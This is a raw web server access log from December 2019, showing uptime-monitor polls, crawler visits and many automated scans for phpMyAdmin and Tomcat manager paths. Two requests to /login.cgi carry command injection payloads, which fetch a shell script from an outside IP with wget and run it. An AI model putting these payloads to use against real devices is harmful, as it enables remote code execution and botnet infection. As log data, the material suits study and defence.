60.29.69.30 - - [02/Dec/2019:21:44:06 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:06 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:07 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:07 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:07 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:07 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:08 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:08 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:08 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:09 +0100] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:09 +0100] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:09 +0100] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:09 +0100] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:10 +0100] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:10 +0100] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:10 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:10 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:10 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:11 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:11 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:11 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:11 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:12 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:12 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:12 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:13 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:13 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:13 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:13 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:14 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:14 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:14 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:14 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:14 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:15 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:15 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:15 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:15 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:16 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:16 +0100] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:16 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:17 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:17 +0100] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:17 +0100] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:17 +0100] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:18 +0100] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:18 +0100] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:18 +0100] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:18 +0100] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:18 +0100] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:19 +0100] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:19 +0100] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:19 +0100] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:19 +0100] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:20 +0100] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:20 +0100] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:20 +0100] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:21 +0100] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
109.102.226.187 - - [02/Dec/2019:21:44:21 +0100] "GET / HTTP/1.1" 400 7600 "-" "-"
60.29.69.30 - - [02/Dec/2019:21:44:21 +0100] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:21 +0100] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:21 +0100] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:22 +0100] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:22 +0100] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:22 +0100] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:22 +0100] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:22 +0100] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:23 +0100] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:23 +0100] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:23 +0100] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:23 +0100] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:24 +0100] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:24 +0100] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:24 +0100] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:25 +0100] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:25 +0100] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:25 +0100] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:25 +0100] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:26 +0100] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:26 +0100] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:26 +0100] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:27 +0100] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:27 +0100] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
60.29.69.30 - - [02/Dec/2019:21:44:27 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
212.91.246.72 - - [02/Dec/2019:21:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:50:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:51:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.237.135.188 - - [02/Dec/2019:21:52:27 +0100] "GET /6F68ABE5B9063E80EC6FE9594DB181D4.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
35.237.135.188 - - [02/Dec/2019:21:52:28 +0100] "GET /cee8b221c4e57fbcba782cfb3f1f6eb0.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
35.237.135.188 - - [02/Dec/2019:21:52:28 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
35.237.135.188 - - [02/Dec/2019:21:52:28 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:21:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.128.41.50 - - [02/Dec/2019:21:52:56 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Java/1.8.0_131"
212.91.246.72 - - [02/Dec/2019:21:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:54:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.64.107 - - [02/Dec/2019:21:55:20 +0100] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [02/Dec/2019:21:55:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [02/Dec/2019:21:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:57:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:58:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:21:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:00:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:01:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.12.10.203 - - [02/Dec/2019:22:03:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://54.37.74.232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.31.163.237 - - [02/Dec/2019:22:03:43 +0100] "POST /images.php HTTP/1.1" 404 315 "-" "curl/7.58.0"
212.91.246.72 - - [02/Dec/2019:22:03:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:04:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:05:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.180.220.8 - - [02/Dec/2019:22:06:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [02/Dec/2019:22:06:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:07:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:10:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
207.180.220.8 - - [02/Dec/2019:22:10:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
190.97.255.235 - - [02/Dec/2019:22:11:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:22:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:12:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.236.193.93 - - [02/Dec/2019:22:13:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:22:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:14:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:15:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2019:22:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.63.227.26 - - [02/Dec/2019:22:17:51 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [02/Dec/2019:22:18:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.63.227.26 - - [02/Dec/2019:22:19:28 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
74.63.227.26 - - [02/Dec/2019:22:19:34 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
74.63.227.26 - - [02/Dec/2019:22:19:35 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
74.63.227.26 - - [02/Dec/2019:22:19:35 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
74.63.227.26 - - [02/Dec/2019:22:19:36 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [02/Dec/2019:22:19:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.63.227.26 - - [02/Dec/2019:22:19:53 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
74.63.227.26 - - [02/Dec/2019:22:19:58 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [02/Dec/2019:22:20:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.92.68.25 - - [02/Dec/2019:22:21:07 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.239.162.23/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
74.63.227.26 - - [02/Dec/2019:22:21:32 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.175.182.129 - - [02/Dec/2019:22:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2019:22:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
